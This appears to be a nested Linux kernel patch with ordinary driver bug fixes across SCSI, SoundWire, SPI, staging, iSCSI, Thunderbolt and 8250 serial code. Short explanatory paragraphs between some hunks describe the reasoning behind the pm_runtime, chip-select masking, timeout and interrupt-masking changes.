+-			spin_lock_irq(&ndlp->lock);
+-			ndlp->nlp_rpi = LPFC_RPI_ALLOC_ERROR;
+-			ndlp->nlp_flag &= ~NLP_RELEASE_RPI;
+-			spin_unlock_irq(&ndlp->lock);
+-			lpfc_drop_node(vport, ndlp);
++	    vport && vport->port_type == LPFC_NPIV_PORT &&
++	    !(ndlp->fc4_xpt_flags & SCSI_XPT_REGD)) {
++		if (ndlp->nlp_flag & NLP_RELEASE_RPI) {
++			if (ndlp->nlp_state != NLP_STE_PLOGI_ISSUE &&
++			    ndlp->nlp_state != NLP_STE_REG_LOGIN_ISSUE) {
++				lpfc_sli4_free_rpi(phba, ndlp->nlp_rpi);
++				spin_lock_irq(&ndlp->lock);
++				ndlp->nlp_rpi = LPFC_RPI_ALLOC_ERROR;
++				ndlp->nlp_flag &= ~NLP_RELEASE_RPI;
++				spin_unlock_irq(&ndlp->lock);
++			}
+ 		}
++
++		lpfc_drop_node(vport, ndlp);
+ 	}
+ 
+ 	/* Release the originating I/O reference. */
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index a0665bca54b99..5284f9a0b826e 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1780,7 +1780,7 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd)
+ 
+ 	length = scsi_bufflen(scmnd);
+ 	payload = (struct vmbus_packet_mpb_array *)&cmd_request->mpb;
+-	payload_sz = sizeof(cmd_request->mpb);
++	payload_sz = 0;
+ 
+ 	if (scsi_sg_count(scmnd)) {
+ 		unsigned long offset_in_hvpg = offset_in_hvpage(sgl->offset);
+@@ -1789,10 +1789,10 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd)
+ 		unsigned long hvpfn, hvpfns_to_add;
+ 		int j, i = 0, sg_count;
+ 
+-		if (hvpg_count > MAX_PAGE_BUFFER_COUNT) {
++		payload_sz = (hvpg_count * sizeof(u64) +
++			      sizeof(struct vmbus_packet_mpb_array));
+ 
+-			payload_sz = (hvpg_count * sizeof(u64) +
+-				      sizeof(struct vmbus_packet_mpb_array));
++		if (hvpg_count > MAX_PAGE_BUFFER_COUNT) {
+ 			payload = kzalloc(payload_sz, GFP_ATOMIC);
+ 			if (!payload)
+ 				return SCSI_MLQUEUE_DEVICE_BUSY;
+diff --git a/drivers/soundwire/bus.c b/drivers/soundwire/bus.c
+index 76515c33e639e..4fd221d0cc818 100644
+--- a/drivers/soundwire/bus.c
++++ b/drivers/soundwire/bus.c
+@@ -571,9 +571,11 @@ int sdw_nread(struct sdw_slave *slave, u32 addr, size_t count, u8 *val)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&slave->dev);
+-	if (ret < 0 && ret != -EACCES)
++	ret = pm_runtime_get_sync(&slave->dev);
++	if (ret < 0 && ret != -EACCES) {
++		pm_runtime_put_noidle(&slave->dev);
+ 		return ret;
++	}
+ 
+ 	ret = sdw_nread_no_pm(slave, addr, count, val);
+ 
+@@ -595,9 +597,11 @@ int sdw_nwrite(struct sdw_slave *slave, u32 addr, size_t count, const u8 *val)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&slave->dev);
+-	if (ret < 0 && ret != -EACCES)
++	ret = pm_runtime_get_sync(&slave->dev);
++	if (ret < 0 && ret != -EACCES) {
++		pm_runtime_put_noidle(&slave->dev);
+ 		return ret;
++	}
+ 
+ 	ret = sdw_nwrite_no_pm(slave, addr, count, val);
+ 
+@@ -1565,9 +1569,10 @@ static int sdw_handle_slave_alerts(struct sdw_slave *slave)
+ 
+ 	sdw_modify_slave_status(slave, SDW_SLAVE_ALERT);
+ 
+-	ret = pm_runtime_resume_and_get(&slave->dev);
++	ret = pm_runtime_get_sync(&slave->dev);
+ 	if (ret < 0 && ret != -EACCES) {
+ 		dev_err(&slave->dev, "Failed to resume device: %d\n", ret);
++		pm_runtime_put_noidle(&slave->dev);
+ 		return ret;
+ 	}
+ 
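
The reason these hunks trade pm_runtime_resume_and_get() for pm_runtime_get_sync() is the error path: pm_runtime_get_sync() raises the usage counter even when the resume fails, so the caller still holds a reference and must drop it with pm_runtime_put_noidle(). The resulting idiom, sketched against a generic struct device (an illustrative fragment, not bus.c code):

#include <linux/pm_runtime.h>

static int do_transfer(struct device *dev)
{
	int ret;

	ret = pm_runtime_get_sync(dev);
	if (ret < 0 && ret != -EACCES) {
		/* resume failed, but the usage count was still taken */
		pm_runtime_put_noidle(dev);
		return ret;
	}

	/* ... access the hardware here ... */

	pm_runtime_put(dev);
	return 0;
}

(-EACCES is tolerated here, as in the hunks above, because it only means runtime PM is disabled for the device.)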
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 7969881f126dc..58ea013fa918a 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -73,6 +73,23 @@ static const struct adr_remap hp_omen_16[] = {
+ 	{}
+ };
+ 
++/*
++ * Intel NUC M15 LAPRC510 and LAPRC710
++ */
++static const struct adr_remap intel_rooks_county[] = {
++	/* rt711-sdca on link0 */
++	{
++		0x000020025d071100ull,
++		0x000030025d071101ull
++	},
++	/* rt1316-sdca on link2 */
++	{
++		0x000120025d071100ull,
++		0x000230025d131601ull
++	},
++	{}
++};
++
+ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 	/* TGL devices */
+ 	{
+@@ -98,6 +115,14 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_tgl_bios,
+ 	},
++	{
++		/* quirk used for NUC15 'Rooks County' LAPRC510 and LAPRC710 SKUs */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel(R) Client Systems"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LAPRC"),
++		},
++		.driver_data = (void *)intel_rooks_county,
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 866026185c669..21c50972047f5 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -1209,6 +1209,9 @@ static int qcom_swrm_get_port_config(struct qcom_swrm_ctrl *ctrl)
+ 	ctrl->num_dout_ports = val;
+ 
+ 	nports = ctrl->num_dout_ports + ctrl->num_din_ports;
++	if (nports > QCOM_SDW_MAX_PORTS)
++		return -EINVAL;
++
+ 	/* Valid port numbers are from 1-14, so mask out port 0 explicitly */
+ 	set_bit(0, &ctrl->dout_port_mask);
+ 	set_bit(0, &ctrl->din_port_mask);
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index fbd7b354dd36b..2c660a95c17e7 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -253,6 +253,18 @@ static bool spi_imx_can_dma(struct spi_controller *controller, struct spi_device
+ 	return true;
+ }
+ 
++/*
++ * Note the number of natively supported chip selects for MX51 is 4. Some
++ * devices may have less actual SS pins but the register map supports 4. When
++ * using gpio chip selects the cs values passed into the macros below can go
++ * outside the range 0 - 3. We therefore need to limit the cs value to avoid
++ * corrupting bits outside the allocated locations.
++ *
++ * The simplest way to do this is to just mask the cs bits to 2 bits. This
++ * still allows all 4 native chip selects to work as well as gpio chip selects
++ * (which can use any of the 4 chip select configurations).
++ */
++
+ #define MX51_ECSPI_CTRL		0x08
+ #define MX51_ECSPI_CTRL_ENABLE		(1 <<  0)
+ #define MX51_ECSPI_CTRL_XCH		(1 <<  2)
+@@ -261,16 +273,16 @@ static bool spi_imx_can_dma(struct spi_controller *controller, struct spi_device
+ #define MX51_ECSPI_CTRL_DRCTL(drctl)	((drctl) << 16)
+ #define MX51_ECSPI_CTRL_POSTDIV_OFFSET	8
+ #define MX51_ECSPI_CTRL_PREDIV_OFFSET	12
+-#define MX51_ECSPI_CTRL_CS(cs)		((cs) << 18)
++#define MX51_ECSPI_CTRL_CS(cs)		((cs & 3) << 18)
+ #define MX51_ECSPI_CTRL_BL_OFFSET	20
+ #define MX51_ECSPI_CTRL_BL_MASK		(0xfff << 20)
+ 
+ #define MX51_ECSPI_CONFIG	0x0c
+-#define MX51_ECSPI_CONFIG_SCLKPHA(cs)	(1 << ((cs) +  0))
+-#define MX51_ECSPI_CONFIG_SCLKPOL(cs)	(1 << ((cs) +  4))
+-#define MX51_ECSPI_CONFIG_SBBCTRL(cs)	(1 << ((cs) +  8))
+-#define MX51_ECSPI_CONFIG_SSBPOL(cs)	(1 << ((cs) + 12))
+-#define MX51_ECSPI_CONFIG_SCLKCTL(cs)	(1 << ((cs) + 20))
++#define MX51_ECSPI_CONFIG_SCLKPHA(cs)	(1 << ((cs & 3) +  0))
++#define MX51_ECSPI_CONFIG_SCLKPOL(cs)	(1 << ((cs & 3) +  4))
++#define MX51_ECSPI_CONFIG_SBBCTRL(cs)	(1 << ((cs & 3) +  8))
++#define MX51_ECSPI_CONFIG_SSBPOL(cs)	(1 << ((cs & 3) + 12))
++#define MX51_ECSPI_CONFIG_SCLKCTL(cs)	(1 << ((cs & 3) + 20))
+ 
+ #define MX51_ECSPI_INT		0x10
+ #define MX51_ECSPI_INT_TEEN		(1 <<  0)
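
A quick way to see why the new "& 3" mask is safe: any chip-select number, including GPIO chip selects above 3, collapses onto one of the four per-CS configuration slots the register actually has, and the shifted value can never disturb neighbouring bits. A tiny standalone check (not driver code):

#include <assert.h>

#define MX51_ECSPI_CTRL_CS(cs)	(((cs) & 3) << 18)

int main(void)
{
	/* GPIO chip select 5 reuses configuration slot 1 */
	assert(MX51_ECSPI_CTRL_CS(5) == MX51_ECSPI_CTRL_CS(1));
	/* the value never spills past bits 19:18 */
	assert((MX51_ECSPI_CTRL_CS(7) >> 18) == 3);
	return 0;
}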
+diff --git a/drivers/staging/axis-fifo/axis-fifo.c b/drivers/staging/axis-fifo/axis-fifo.c
+index dfd2b357f484b..0a85ea667a1b5 100644
+--- a/drivers/staging/axis-fifo/axis-fifo.c
++++ b/drivers/staging/axis-fifo/axis-fifo.c
+@@ -103,17 +103,17 @@
+  *           globals
+  * ----------------------------
+  */
+-static int read_timeout = 1000; /* ms to wait before read() times out */
+-static int write_timeout = 1000; /* ms to wait before write() times out */
++static long read_timeout = 1000; /* ms to wait before read() times out */
++static long write_timeout = 1000; /* ms to wait before write() times out */
+ 
+ /* ----------------------------
+  * module command-line arguments
+  * ----------------------------
+  */
+ 
+-module_param(read_timeout, int, 0444);
++module_param(read_timeout, long, 0444);
+ MODULE_PARM_DESC(read_timeout, "ms to wait before blocking read() timing out; set to -1 for no timeout");
+-module_param(write_timeout, int, 0444);
++module_param(write_timeout, long, 0444);
+ MODULE_PARM_DESC(write_timeout, "ms to wait before blocking write() timing out; set to -1 for no timeout");
+ 
+ /* ----------------------------
+@@ -384,9 +384,7 @@ static ssize_t axis_fifo_read(struct file *f, char __user *buf,
+ 		mutex_lock(&fifo->read_lock);
+ 		ret = wait_event_interruptible_timeout(fifo->read_queue,
+ 			ioread32(fifo->base_addr + XLLF_RDFO_OFFSET),
+-				 (read_timeout >= 0) ?
+-				  msecs_to_jiffies(read_timeout) :
+-				  MAX_SCHEDULE_TIMEOUT);
++			read_timeout);
+ 
+ 		if (ret <= 0) {
+ 			if (ret == 0) {
+@@ -528,9 +526,7 @@ static ssize_t axis_fifo_write(struct file *f, const char __user *buf,
+ 		ret = wait_event_interruptible_timeout(fifo->write_queue,
+ 			ioread32(fifo->base_addr + XLLF_TDFV_OFFSET)
+ 				 >= words_to_write,
+-				 (write_timeout >= 0) ?
+-				  msecs_to_jiffies(write_timeout) :
+-				  MAX_SCHEDULE_TIMEOUT);
++			write_timeout);
+ 
+ 		if (ret <= 0) {
+ 			if (ret == 0) {
+@@ -948,7 +944,17 @@ static struct platform_driver axis_fifo_driver = {
+ 
+ static int __init axis_fifo_init(void)
+ {
+-	pr_info("axis-fifo driver loaded with parameters read_timeout = %i, write_timeout = %i\n",
++	if (read_timeout >= 0)
++		read_timeout = msecs_to_jiffies(read_timeout);
++	else
++		read_timeout = MAX_SCHEDULE_TIMEOUT;
++
++	if (write_timeout >= 0)
++		write_timeout = msecs_to_jiffies(write_timeout);
++	else
++		write_timeout = MAX_SCHEDULE_TIMEOUT;
++
++	pr_info("axis-fifo driver loaded with parameters read_timeout = %li, write_timeout = %li\n",
+ 		read_timeout, write_timeout);
+ 	return platform_driver_register(&axis_fifo_driver);
+ }
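
The int-to-long change is not cosmetic: the "no timeout" sentinel, MAX_SCHEDULE_TIMEOUT, is defined as LONG_MAX and would be truncated in an int, and converting milliseconds to jiffies once at module init keeps the wait_event_interruptible_timeout() call sites trivial. A userspace sketch of the one-time conversion (the HZ value is assumed for the demo):

#include <limits.h>
#include <stdio.h>

#define HZ 250				/* assumed tick rate, for illustration */
#define MAX_SCHEDULE_TIMEOUT LONG_MAX	/* the kernel's "wait forever" value */

static long timeout_ms_to_jiffies(long ms)
{
	if (ms < 0)
		return MAX_SCHEDULE_TIMEOUT;	/* -1 => block indefinitely */
	return (ms * HZ + 999) / 1000;		/* round up, roughly as msecs_to_jiffies does */
}

int main(void)
{
	printf("%ld %ld\n", timeout_ms_to_jiffies(1000), timeout_ms_to_jiffies(-1));
	return 0;
}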
+diff --git a/drivers/staging/media/imx/imx-media-capture.c b/drivers/staging/media/imx/imx-media-capture.c
+index 93ba092360105..5cc67786b9169 100644
+--- a/drivers/staging/media/imx/imx-media-capture.c
++++ b/drivers/staging/media/imx/imx-media-capture.c
+@@ -501,14 +501,14 @@ static int capture_legacy_g_parm(struct file *file, void *fh,
+ 				 struct v4l2_streamparm *a)
+ {
+ 	struct capture_priv *priv = video_drvdata(file);
+-	struct v4l2_subdev_frame_interval fi;
++	struct v4l2_subdev_frame_interval fi = {
++		.pad = priv->src_sd_pad,
++	};
+ 	int ret;
+ 
+ 	if (a->type != V4L2_BUF_TYPE_VIDEO_CAPTURE)
+ 		return -EINVAL;
+ 
+-	memset(&fi, 0, sizeof(fi));
+-	fi.pad = priv->src_sd_pad;
+ 	ret = v4l2_subdev_call(priv->src_sd, video, g_frame_interval, &fi);
+ 	if (ret < 0)
+ 		return ret;
+@@ -523,14 +523,14 @@ static int capture_legacy_s_parm(struct file *file, void *fh,
+ 				 struct v4l2_streamparm *a)
+ {
+ 	struct capture_priv *priv = video_drvdata(file);
+-	struct v4l2_subdev_frame_interval fi;
++	struct v4l2_subdev_frame_interval fi = {
++		.pad = priv->src_sd_pad,
++	};
+ 	int ret;
+ 
+ 	if (a->type != V4L2_BUF_TYPE_VIDEO_CAPTURE)
+ 		return -EINVAL;
+ 
+-	memset(&fi, 0, sizeof(fi));
+-	fi.pad = priv->src_sd_pad;
+ 	fi.interval = a->parm.capture.timeperframe;
+ 	ret = v4l2_subdev_call(priv->src_sd, video, s_frame_interval, &fi);
+ 	if (ret < 0)
+diff --git a/drivers/staging/media/imx/imx-media-utils.c b/drivers/staging/media/imx/imx-media-utils.c
+index 3e7462112649d..4985f21b4023f 100644
+--- a/drivers/staging/media/imx/imx-media-utils.c
++++ b/drivers/staging/media/imx/imx-media-utils.c
+@@ -432,15 +432,15 @@ int imx_media_init_cfg(struct v4l2_subdev *sd,
+ 		       struct v4l2_subdev_state *sd_state)
+ {
+ 	struct v4l2_mbus_framefmt *mf_try;
+-	struct v4l2_subdev_format format;
+ 	unsigned int pad;
+ 	int ret;
+ 
+ 	for (pad = 0; pad < sd->entity.num_pads; pad++) {
+-		memset(&format, 0, sizeof(format));
++		struct v4l2_subdev_format format = {
++			.pad = pad,
++			.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
+ 
+-		format.pad = pad;
+-		format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 		ret = v4l2_subdev_call(sd, pad, get_fmt, NULL, &format);
+ 		if (ret)
+ 			continue;
+diff --git a/drivers/staging/media/omap4iss/iss_video.c b/drivers/staging/media/omap4iss/iss_video.c
+index 60f3d84be8285..8cc8b3ebab11f 100644
+--- a/drivers/staging/media/omap4iss/iss_video.c
++++ b/drivers/staging/media/omap4iss/iss_video.c
+@@ -244,7 +244,9 @@ static int
+ __iss_video_get_format(struct iss_video *video,
+ 		       struct v4l2_mbus_framefmt *format)
+ {
+-	struct v4l2_subdev_format fmt;
++	struct v4l2_subdev_format fmt = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	struct v4l2_subdev *subdev;
+ 	u32 pad;
+ 	int ret;
+@@ -253,9 +255,7 @@ __iss_video_get_format(struct iss_video *video,
+ 	if (!subdev)
+ 		return -EINVAL;
+ 
+-	memset(&fmt, 0, sizeof(fmt));
+ 	fmt.pad = pad;
+-	fmt.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 
+ 	mutex_lock(&video->mutex);
+ 	ret = v4l2_subdev_call(subdev, pad, get_fmt, NULL, &fmt);
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index c1e50084172d8..7e11364d718bf 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -48,9 +48,9 @@ static const struct rtl819x_ops rtl819xp_ops = {
+ };
+ 
+ static struct pci_device_id rtl8192_pci_id_tbl[] = {
+-	{RTL_PCI_DEVICE(0x10ec, 0x8192, rtl819xp_ops)},
+-	{RTL_PCI_DEVICE(0x07aa, 0x0044, rtl819xp_ops)},
+-	{RTL_PCI_DEVICE(0x07aa, 0x0047, rtl819xp_ops)},
++	{PCI_DEVICE(0x10ec, 0x8192)},
++	{PCI_DEVICE(0x07aa, 0x0044)},
++	{PCI_DEVICE(0x07aa, 0x0047)},
+ 	{}
+ };
+ 
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+index 7021f9c435d96..50f1ec78cc457 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+@@ -55,11 +55,6 @@
+ #define IS_HARDWARE_TYPE_8192SE(_priv)		\
+ 	(((struct r8192_priv *)rtllib_priv(dev))->card_8192 == NIC_8192SE)
+ 
+-#define RTL_PCI_DEVICE(vend, dev, cfg) \
+-	.vendor = (vend), .device = (dev), \
+-	.subvendor = PCI_ANY_ID, .subdevice = PCI_ANY_ID, \
+-	.driver_data = (kernel_ulong_t)&(cfg)
+-
+ #define TOTAL_CAM_ENTRY		32
+ #define CAM_CONTENT_COUNT	8
+ 
+diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c
+index 3f7a9f7f5f4e3..07e196b44b91d 100644
+--- a/drivers/target/iscsi/iscsi_target.c
++++ b/drivers/target/iscsi/iscsi_target.c
+@@ -4531,6 +4531,9 @@ int iscsit_close_session(struct iscsit_session *sess, bool can_sleep)
+ 	iscsit_stop_time2retain_timer(sess);
+ 	spin_unlock_bh(&se_tpg->session_lock);
+ 
++	if (sess->sess_ops->ErrorRecoveryLevel == 2)
++		iscsit_free_connection_recovery_entries(sess);
++
+ 	/*
+ 	 * transport_deregister_session_configfs() will clear the
+ 	 * struct se_node_acl->nacl_sess pointer now as a iscsi_np process context
+@@ -4554,9 +4557,6 @@ int iscsit_close_session(struct iscsit_session *sess, bool can_sleep)
+ 
+ 	transport_deregister_session(sess->se_sess);
+ 
+-	if (sess->sess_ops->ErrorRecoveryLevel == 2)
+-		iscsit_free_connection_recovery_entries(sess);
+-
+ 	iscsit_free_all_ooo_cmdsns(sess);
+ 
+ 	spin_lock_bh(&se_tpg->session_lock);
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index cfebec107f3fc..0a525f44ea316 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -54,6 +54,21 @@ static int ring_interrupt_index(const struct tb_ring *ring)
+ 	return bit;
+ }
+ 
++static void nhi_mask_interrupt(struct tb_nhi *nhi, int mask, int ring)
++{
++	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++		return;
++	iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + ring);
++}
++
++static void nhi_clear_interrupt(struct tb_nhi *nhi, int ring)
++{
++	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++		ioread32(nhi->iobase + REG_RING_NOTIFY_BASE + ring);
++	else
++		iowrite32(~0, nhi->iobase + REG_RING_INT_CLEAR + ring);
++}
++
+ /*
+  * ring_interrupt_active() - activate/deactivate interrupts for a single ring
+  *
+@@ -61,8 +76,8 @@ static int ring_interrupt_index(const struct tb_ring *ring)
+  */
+ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ {
+-	int reg = REG_RING_INTERRUPT_BASE +
+-		  ring_interrupt_index(ring) / 32 * 4;
++	int index = ring_interrupt_index(ring) / 32 * 4;
++	int reg = REG_RING_INTERRUPT_BASE + index;
+ 	int interrupt_bit = ring_interrupt_index(ring) & 31;
+ 	int mask = 1 << interrupt_bit;
+ 	u32 old, new;
+@@ -123,7 +138,11 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 					 "interrupt for %s %d is already %s\n",
+ 					 RING_TYPE(ring), ring->hop,
+ 					 active ? "enabled" : "disabled");
+-	iowrite32(new, ring->nhi->iobase + reg);
++
++	if (active)
++		iowrite32(new, ring->nhi->iobase + reg);
++	else
++		nhi_mask_interrupt(ring->nhi, mask, index);
+ }
+ 
+ /*
+@@ -136,11 +155,11 @@ static void nhi_disable_interrupts(struct tb_nhi *nhi)
+ 	int i = 0;
+ 	/* disable interrupts */
+ 	for (i = 0; i < RING_INTERRUPT_REG_COUNT(nhi); i++)
+-		iowrite32(0, nhi->iobase + REG_RING_INTERRUPT_BASE + 4 * i);
++		nhi_mask_interrupt(nhi, ~0, 4 * i);
+ 
+ 	/* clear interrupt status bits */
+ 	for (i = 0; i < RING_NOTIFY_REG_COUNT(nhi); i++)
+-		ioread32(nhi->iobase + REG_RING_NOTIFY_BASE + 4 * i);
++		nhi_clear_interrupt(nhi, 4 * i);
+ }
+ 
+ /* ring helper methods */
+diff --git a/drivers/thunderbolt/nhi_regs.h b/drivers/thunderbolt/nhi_regs.h
+index faef165a919cc..6ba2958154770 100644
+--- a/drivers/thunderbolt/nhi_regs.h
++++ b/drivers/thunderbolt/nhi_regs.h
+@@ -93,6 +93,8 @@ struct ring_desc {
+ #define REG_RING_INTERRUPT_BASE	0x38200
+ #define RING_INTERRUPT_REG_COUNT(nhi) ((31 + 2 * nhi->hop_count) / 32)
+ 
++#define REG_RING_INTERRUPT_MASK_CLEAR_BASE	0x38208
++
+ #define REG_INT_THROTTLING_RATE	0x38c00
+ 
+ /* Interrupt Vector Allocation */
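
For context on the two helpers introduced above: on controllers without the auto-clear quirk, REG_RING_INTERRUPT_MASK_CLEAR_BASE lets the driver disable a ring interrupt with a single write-one-to-clear store, avoiding a read-modify-write cycle on REG_RING_INTERRUPT_BASE that could clobber concurrent updates to other rings' bits. A rough sketch of the difference (illustrative only, not the driver's exact code):

    /* Read-modify-write: other bits may change between the two accesses. */
    val = ioread32(nhi->iobase + REG_RING_INTERRUPT_BASE + reg);
    iowrite32(val & ~mask, nhi->iobase + REG_RING_INTERRUPT_BASE + reg);

    /* Write-one-to-clear: clears exactly the selected enable bits. */
    iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + reg);
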
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index 36e31b96ef4a5..ffc7f67e27e35 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1014,7 +1014,7 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	of_property_read_u32(np, "clock-frequency", &clk_rate);
+ 
+ 	/* See if a Baud clock has been specified */
+-	baud_mux_clk = of_clk_get_by_name(np, "sw_baud");
++	baud_mux_clk = devm_clk_get(dev, "sw_baud");
+ 	if (IS_ERR(baud_mux_clk)) {
+ 		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER) {
+ 			ret = -EPROBE_DEFER;
+@@ -1034,7 +1034,7 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	if (clk_rate == 0) {
+ 		dev_err(dev, "clock-frequency or clk not defined\n");
+ 		ret = -EINVAL;
+-		goto release_dma;
++		goto err_clk_disable;
+ 	}
+ 
+ 	dev_dbg(dev, "DMA is %senabled\n", priv->dma_enabled ? "" : "not ");
+@@ -1121,6 +1121,8 @@ err1:
+ 	serial8250_unregister_port(priv->line);
+ err:
+ 	brcmuart_free_bufs(dev, priv);
++err_clk_disable:
++	clk_disable_unprepare(baud_mux_clk);
+ release_dma:
+ 	if (priv->dma_enabled)
+ 		brcmuart_arbitration(priv, 0);
+@@ -1135,6 +1137,7 @@ static int brcmuart_remove(struct platform_device *pdev)
+ 	hrtimer_cancel(&priv->hrt);
+ 	serial8250_unregister_port(priv->line);
+ 	brcmuart_free_bufs(&pdev->dev, priv);
++	clk_disable_unprepare(priv->baud_mux_clk);
+ 	if (priv->dma_enabled)
+ 		brcmuart_arbitration(priv, 0);
+ 	return 0;
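
Two fixes are combined in the 8250_bcm7271 hunk: the baud-mux clock is now acquired with devm_clk_get(), tying the reference to the device lifetime, and clk_disable_unprepare() is added to the error path and to remove(), since devres only drops the reference, not the prepare/enable state. The canonical shape of this pattern (a sketch, error handling abbreviated):

    clk = devm_clk_get(dev, "sw_baud");     /* clk_put() handled by devres */
    if (IS_ERR(clk))
            return PTR_ERR(clk);

    ret = clk_prepare_enable(clk);
    if (ret)
            return ret;
    /* ... */
    clk_disable_unprepare(clk);             /* still manual on error/remove */
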
+diff --git a/drivers/tty/serial/8250/8250_core.c b/drivers/tty/serial/8250/8250_core.c
+index 94fbf0add2ce2..81a5dab1a8286 100644
+--- a/drivers/tty/serial/8250/8250_core.c
++++ b/drivers/tty/serial/8250/8250_core.c
+@@ -1157,6 +1157,7 @@ void serial8250_unregister_port(int line)
+ 		uart->port.type = PORT_UNKNOWN;
+ 		uart->port.dev = &serial8250_isa_devs->dev;
+ 		uart->capabilities = 0;
++		serial8250_init_port(uart);
+ 		serial8250_apply_quirks(uart);
+ 		uart_add_one_port(&serial8250_reg, &uart->port);
+ 	} else {
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index 64770c62bbec5..b406cba10b0eb 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -40,9 +40,13 @@
+ #define PCI_DEVICE_ID_COMMTECH_4224PCIE		0x0020
+ #define PCI_DEVICE_ID_COMMTECH_4228PCIE		0x0021
+ #define PCI_DEVICE_ID_COMMTECH_4222PCIE		0x0022
++
+ #define PCI_DEVICE_ID_EXAR_XR17V4358		0x4358
+ #define PCI_DEVICE_ID_EXAR_XR17V8358		0x8358
+ 
++#define PCI_SUBDEVICE_ID_USR_2980		0x0128
++#define PCI_SUBDEVICE_ID_USR_2981		0x0129
++
+ #define PCI_DEVICE_ID_SEALEVEL_710xC		0x1001
+ #define PCI_DEVICE_ID_SEALEVEL_720xC		0x1002
+ #define PCI_DEVICE_ID_SEALEVEL_740xC		0x1004
+@@ -829,6 +833,15 @@ static const struct exar8250_board pbn_exar_XR17V8358 = {
+ 		(kernel_ulong_t)&bd			\
+ 	}
+ 
++#define USR_DEVICE(devid, sdevid, bd) {			\
++	PCI_DEVICE_SUB(					\
++		PCI_VENDOR_ID_USR,			\
++		PCI_DEVICE_ID_EXAR_##devid,		\
++		PCI_VENDOR_ID_EXAR,			\
++		PCI_SUBDEVICE_ID_USR_##sdevid), 0, 0,	\
++		(kernel_ulong_t)&bd			\
++	}
++
+ static const struct pci_device_id exar_pci_tbl[] = {
+ 	EXAR_DEVICE(ACCESSIO, COM_2S, pbn_exar_XR17C15x),
+ 	EXAR_DEVICE(ACCESSIO, COM_4S, pbn_exar_XR17C15x),
+@@ -853,6 +866,10 @@ static const struct pci_device_id exar_pci_tbl[] = {
+ 
+ 	IBM_DEVICE(XR17C152, SATURN_SERIAL_ONE_PORT, pbn_exar_ibm_saturn),
+ 
++	/* USRobotics USR298x-OEM PCI Modems */
++	USR_DEVICE(XR17C152, 2980, pbn_exar_XR17C15x),
++	USR_DEVICE(XR17C152, 2981, pbn_exar_XR17C15x),
++
+ 	/* Exar Corp. XR17C15[248] Dual/Quad/Octal UART */
+ 	EXAR_DEVICE(EXAR, XR17C152, pbn_exar_XR17C15x),
+ 	EXAR_DEVICE(EXAR, XR17C154, pbn_exar_XR17C15x),
+diff --git a/drivers/tty/serial/8250/8250_pci.c b/drivers/tty/serial/8250/8250_pci.c
+index 8e9f247590bd4..cd27821f54ec2 100644
+--- a/drivers/tty/serial/8250/8250_pci.c
++++ b/drivers/tty/serial/8250/8250_pci.c
+@@ -1940,6 +1940,8 @@ pci_moxa_setup(struct serial_private *priv,
+ #define PCI_SUBDEVICE_ID_SIIG_DUAL_30	0x2530
+ #define PCI_VENDOR_ID_ADVANTECH		0x13fe
+ #define PCI_DEVICE_ID_INTEL_CE4100_UART 0x2e66
++#define PCI_DEVICE_ID_ADVANTECH_PCI1600	0x1600
++#define PCI_DEVICE_ID_ADVANTECH_PCI1600_1611	0x1611
+ #define PCI_DEVICE_ID_ADVANTECH_PCI3620	0x3620
